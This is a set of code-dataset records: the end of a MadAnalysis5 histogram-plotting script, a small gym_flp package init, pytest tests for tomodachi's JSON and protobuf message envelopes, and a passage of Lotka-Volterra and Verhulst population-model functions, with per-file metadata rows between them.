00572416630978,0.0,0.0,0.0,0.0,0.00568977762912,0.0,0.00574324207748,0.0,0.0,0.0114251660216,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00567245254178,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00567245254178,0.0,0.0,0.00567245254178,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00571686220542,0.0,0.0,0.0,0.00566683706835,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00570356146684,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00575000989748,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating weights for histo: y11_M_16
y11_M_16_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.00203241406042,0.0,0.0,0.00067650764146,0.000677297918033,0.00067863838533,0.000675013565418,0.0,0.000677348014119,0.00203181492856,0.0,0.00135391051585,0.0013552955932,0.00135434983108,0.0020298197473,0.000677001816964,0.000675013565418,0.0,0.00203381299721,0.0,0.0,0.0,0.0,0.000677402874385,0.0,0.00135265363827,0.0,0.000677831361939,0.000677572652472,0.0,0.00135476373736,0.0,0.0,0.00067863838533,0.0,0.0,0.000677348014119,0.00067650764146,0.0,0.0,0.0,0.000679381597569,0.000677051768681,0.0,0.0,0.000676887620989,0.00135423563511,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000674995086171,0.0,0.0,0.0,0.0,0.00135439963843,0.0,0.00135521792261,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0006757612531,0.0,0.0,0.0,0.0,0.0,0.000675013565418,0.0,0.0,0.0,0.000679381597569,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677753691351,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000675013565418,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000675579636745,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677831361939,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000677876116366,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000676288922241,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0])
# Creating a new Canvas
fig = plt.figure(figsize=(12,6),dpi=80)
frame = gridspec.GridSpec(1,1,right=0.7)
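# right=0.7 confines the axes to the left 70% of the figure, leaving room for the legend placed outside on the right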
pad = fig.add_subplot(frame[0])
# Creating a new Stack
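# The stack is drawn as overlaid step histograms of cumulative weight sums, from the total of all 17 contributions down to the signal alone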
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights+y11_M_15_weights+y11_M_16_weights,\
label="$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#e5e5e5", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights+y11_M_15_weights,\
label="$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#f2f2f2", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights,\
label="$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights,\
label="$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights,\
label="$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights,\
label="$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights,\
label="$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights,\
label="$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights,\
label="$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights,\
label="$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights,\
label="$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights,\
label="$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights,\
label="$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights,\
label="$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights+y11_M_2_weights,\
label="$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights+y11_M_1_weights,\
label="$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
pad.hist(x=xData, bins=xBinning, weights=y11_M_0_weights,\
label="$signal$", histtype="step", rwidth=1.0,\
color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\
bottom=None, cumulative=False, density=False, align="mid", orientation="vertical")
# Axis
plt.rc('text',usetex=False)
plt.xlabel(r"M [ a_{1} , a_{2} ] ( GeV ) ",\
fontsize=16,color="black")
plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 150.0\ \mathrm{fb}^{-1})$ ",\
fontsize=16,color="black")
# Boundary of y-axis
ymax=(y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights+y11_M_15_weights+y11_M_16_weights).max()*1.1
#ymin=0 # linear scale
ymin=min([x for x in (y11_M_0_weights+y11_M_1_weights+y11_M_2_weights+y11_M_3_weights+y11_M_4_weights+y11_M_5_weights+y11_M_6_weights+y11_M_7_weights+y11_M_8_weights+y11_M_9_weights+y11_M_10_weights+y11_M_11_weights+y11_M_12_weights+y11_M_13_weights+y11_M_14_weights+y11_M_15_weights+y11_M_16_weights) if x])/100. # log scale
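# lower bound for the log-scale y-axis: smallest non-zero stacked bin content, divided by 100 for margin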
plt.gca().set_ylim(ymin,ymax)
# Log/Linear scale for X-axis
plt.gca().set_xscale("linear")
#plt.gca().set_xscale("log",nonpositive="clip")
# Log/Linear scale for Y-axis
#plt.gca().set_yscale("linear")
plt.gca().set_yscale("log",nonpositive="clip")
# Legend
plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.)
# Saving the image
plt.savefig('../../HTML/MadAnalysis5job_0/selection_10.png')
plt.savefig('../../PDF/MadAnalysis5job_0/selection_10.png')
plt.savefig('../../DVI/MadAnalysis5job_0/selection_10.eps')
# Running!
if __name__ == '__main__':
selection_10()
| 316.092784
| 5,172
| 0.713626
| 16,225
| 61,322
| 2.65208
| 0.124006
| 0.4693
| 0.680316
| 0.876505
| 0.432094
| 0.40897
| 0.405903
| 0.393749
| 0.392424
| 0.380339
| 0
| 0.616475
| 0.027021
| 61,322
| 193
| 5,173
| 317.73057
| 0.104718
| 0.01572
| 0
| 0.185841
| 0
| 0.00885
| 0.017373
| 0.003365
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00885
| false
| 0
| 0.035398
| 0
| 0.044248
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89aeef0594e93ed4bc9c391337f1d967f77a7fcf
| 65
|
py
|
Python
|
gym_flp/rewards/__init__.py
|
TejaswiniMedi/gym-flp
|
97d1d1b510896ab5b871cfc9f591fbbffd830ff4
|
[
"MIT"
] | 1
|
2021-05-10T01:38:21.000Z
|
2021-05-10T01:38:21.000Z
|
gym_flp/rewards/__init__.py
|
TejaswiniMedi/gym-flp
|
97d1d1b510896ab5b871cfc9f591fbbffd830ff4
|
[
"MIT"
] | 10
|
2021-03-11T15:32:12.000Z
|
2021-09-20T19:30:50.000Z
|
gym_flp/rewards/__init__.py
|
TejaswiniMedi/gym-flp
|
97d1d1b510896ab5b871cfc9f591fbbffd830ff4
|
[
"MIT"
] | 1
|
2021-05-29T10:23:46.000Z
|
2021-05-29T10:23:46.000Z
|
from gym_flp.rewards import mhc
from gym_flp.rewards import area
| 32.5
| 32
| 0.846154
| 12
| 65
| 4.416667
| 0.583333
| 0.264151
| 0.377358
| 0.641509
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123077
| 65
| 2
| 33
| 32.5
| 0.929825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
981deb28ab5e832e600ffb51e547762743fd0ce7
| 10,488
|
py
|
Python
|
tests/test_envelope.py
|
xdmiodz/tomodachi
|
abe449b0d09683cfc4791e61bc951b0de796e80b
|
[
"MIT"
] | 1
|
2021-11-01T02:18:55.000Z
|
2021-11-01T02:18:55.000Z
|
tests/test_envelope.py
|
xdmiodz/tomodachi
|
abe449b0d09683cfc4791e61bc951b0de796e80b
|
[
"MIT"
] | 100
|
2021-04-21T10:00:09.000Z
|
2022-03-24T23:13:32.000Z
|
tests/test_envelope.py
|
tranvietanh1991/tomodachi
|
a815fc718b6cc42dc3fe241abb0e5a5829eba0e8
|
[
"MIT"
] | 1
|
2020-09-04T05:53:16.000Z
|
2020-09-04T05:53:16.000Z
|
import json
import os
import signal
import time
from typing import Any
import pytest
from google.protobuf.json_format import MessageToJson
from proto_build.message_pb2 import Person
from run_test_service_helper import start_service
from tomodachi.envelope.proto_build.protobuf.sns_sqs_message_pb2 import SNSSQSMessage # noqa
from tomodachi.validation.validation import RegexMissmatchException, validate_field_regex
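# Round-trip tests for the JSON and protobuf message envelopes: build_message/parse_message, gzip encoding of large payloads, and regex validators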
def test_json_base(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_service.py", monkeypatch)
instance = services.get("test_dummy")
async def _async() -> None:
data = {"key": "value"}
t1 = time.time()
json_message = await instance.message_envelope.build_message(instance, "topic", data)
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(json_message)
assert result.get("data") == data
assert result.get("metadata", {}).get("data_encoding") == "raw"
assert len(json.dumps(result.get("data"))) == len(json.dumps(data))
assert json.dumps(result.get("data")) == json.dumps(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_json_base_large_message(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_service.py", monkeypatch)
instance = services.get("test_dummy")
async def _async() -> None:
data = ["item {}".format(i) for i in range(1, 10000)]
assert len(json.dumps(data)) > 60000
t1 = time.time()
json_message = await instance.message_envelope.build_message(instance, "topic", data)
assert len(json.dumps(json_message)) < 60000
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(json_message)
assert result.get("metadata", {}).get("data_encoding") == "base64_gzip_json"
assert len(json.dumps(result.get("data"))) == len(json.dumps(data))
assert json.dumps(result.get("data")) == json.dumps(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
t1 = time.time()
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
t2 = time.time()
result, message_uuid, timestamp = await instance.message_envelope.parse_message(protobuf_message, Person)
assert type(result.get("data")) is Person
assert result.get("data") == data
assert result.get("metadata", {}).get("data_encoding") == "proto"
assert result.get("data") == data
assert result.get("data").name == data.name
assert result.get("data").id == data.id
assert len(MessageToJson(result.get("data"))) == len(MessageToJson(data))
assert MessageToJson(result.get("data")) == MessageToJson(data)
assert len(message_uuid) == 73
assert message_uuid[0:36] == instance.uuid
assert timestamp >= t1
assert timestamp <= t2
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base_no_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
result, message_uuid, timestamp = await instance.message_envelope.parse_message(protobuf_message)
assert type(result.get("data")) is not Person
assert type(result.get("data")) is bytes
assert result.get("data") != data
assert result.get("data") == b"\n\x0212\x12\x08John Doe"
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_base_bad_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
json_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(json_message, str)
with pytest.raises(AttributeError):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_validation_no_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
instance.message_envelope.validate()
with pytest.raises(Exception):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_validation_bad_proto_class(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
async def _async() -> None:
instance.message_envelope.validate(proto_class=str)
with pytest.raises(Exception):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_validation_function(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_validator(person: Person) -> None:
validate_field_regex(person.name, r"^[a-zA-Z ]+$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_validator)
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_static_validation_function(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_static_validator(person: Person) -> None:
validate_field_regex(person.name, r"^[a-zA-Z ]+$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_static_validator)
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_validation_function_fail(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_validator(person: Person) -> None:
validate_field_regex(person.name, r"^(#?[a-fA-F0-9]{6}|)$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_validator)
with pytest.raises(RegexMissmatchException):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
def test_protobuf_object_static_validation_function_fail(monkeypatch: Any, capsys: Any, loop: Any) -> None:
services, future = start_service("tests/services/dummy_protobuf_service.py", monkeypatch)
instance = services.get("test_dummy_protobuf")
def test_static_validator(person: Person) -> None:
validate_field_regex(person.name, r"^(#?[a-fA-F0-9]{6}|)$")
async def _async() -> None:
data = Person()
data.name = "John Doe"
data.id = "12"
protobuf_message = await instance.message_envelope.build_message(instance, "topic", data)
await instance.message_envelope.parse_message(protobuf_message, Person, test_static_validator)
with pytest.raises(RegexMissmatchException):
loop.run_until_complete(_async())
async def _async_kill():
os.kill(os.getpid(), signal.SIGINT)
loop.create_task(_async_kill())
loop.run_until_complete(future)
| 36.041237
| 113
| 0.691266
| 1,316
| 10,488
| 5.261398
| 0.091945
| 0.025419
| 0.041306
| 0.063547
| 0.894136
| 0.894136
| 0.890526
| 0.879116
| 0.877527
| 0.864529
| 0
| 0.008806
| 0.187929
| 10,488
| 290
| 114
| 36.165517
| 0.804156
| 0.000381
| 0
| 0.785366
| 0
| 0
| 0.093875
| 0.044266
| 0
| 0
| 0
| 0
| 0.160976
| 1
| 0.073171
| false
| 0
| 0.053659
| 0
| 0.126829
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98b6c45be0ec766d97578a01056a9244519386fe
| 3,936
|
py
|
Python
|
Python/Functions.py
|
ibrahimadlani/ProjectM3202c
|
dd71b708ff3b9e7471d702e1ca35e3446039fc62
|
[
"MIT"
] | null | null | null |
Python/Functions.py
|
ibrahimadlani/ProjectM3202c
|
dd71b708ff3b9e7471d702e1ca35e3446039fc62
|
[
"MIT"
] | null | null | null |
Python/Functions.py
|
ibrahimadlani/ProjectM3202c
|
dd71b708ff3b9e7471d702e1ca35e3446039fc62
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from math import exp
import Constants as Constants
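# Rate terms for prey/predator population models: Malthus and Verhulst growth/mortality, Lotka-Volterra couplings, and Gause/Holling functional responses, with parameters from Constants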
def malthus(number_of_individuals:float):
return Constants.PREY_GROWTH_RATE * number_of_individuals
def malthusMortality(number_of_individuals:float):
return -Constants.PREDATOR_MORTALITY_RATE * number_of_individuals
def verhulst(number_of_individuals:float):
return Constants.PREY_GROWTH_RATE * number_of_individuals * (1 - number_of_individuals / Constants.ENVIRONMENTAL_CAPACITY)
def verhulstMortality(number_of_individuals:float):
return -Constants.PREDATOR_MORTALITY_RATE * number_of_individuals * (1 + number_of_individuals / Constants.ENVIRONMENTAL_CAPACITY)
def lotkaVolterraPrey(number_of_preys:float, number_of_predators:float):
return malthus(number_of_preys) - Constants.PREDATOR_PREDATION_RATE * number_of_preys * number_of_predators
def lotkaVolterraPredator(number_of_preys:float, number_of_predators:float):
return malthusMortality(number_of_predators) + Constants.PREDATOR_GROWTH_RATE * number_of_preys * number_of_predators
def lotkaVolterraVerhulstPrey(number_of_preys:float, number_of_predators:float):
return verhulst(number_of_preys) - Constants.PREDATOR_PREDATION_RATE * number_of_preys * number_of_predators
def lotkaVolterraVerhulstPredator(number_of_preys:float, number_of_predators:float):
return verhulstMortality(number_of_predators) + Constants.PREDATOR_GROWTH_RATE * number_of_preys * number_of_predators
# def gausePrey(number_of_preys:float, number_of_predators:float):
# return malthus(number_of_preys) - (number_of_preys ** Constants.PREDATOR_SATIETY) * number_of_predators
# def hollingIIPrey(number_of_preys:float, number_of_predators:float):
# return verhulst(number_of_preys) - (Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys * number_of_predators)/(1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * Constants.CAPTURE_TIME * number_of_preys)
# def hollingIIPredator(number_of_preys:float, number_of_predators:float):
# return -Constants.PREDATOR_MORTALITY_RATE * number_of_predators + (Constants.SEARCH_TIME * Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys * number_of_predators)/(1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys * number_of_predators)
# def hollingIIIPrey(number_of_preys:float, number_of_predators:float):
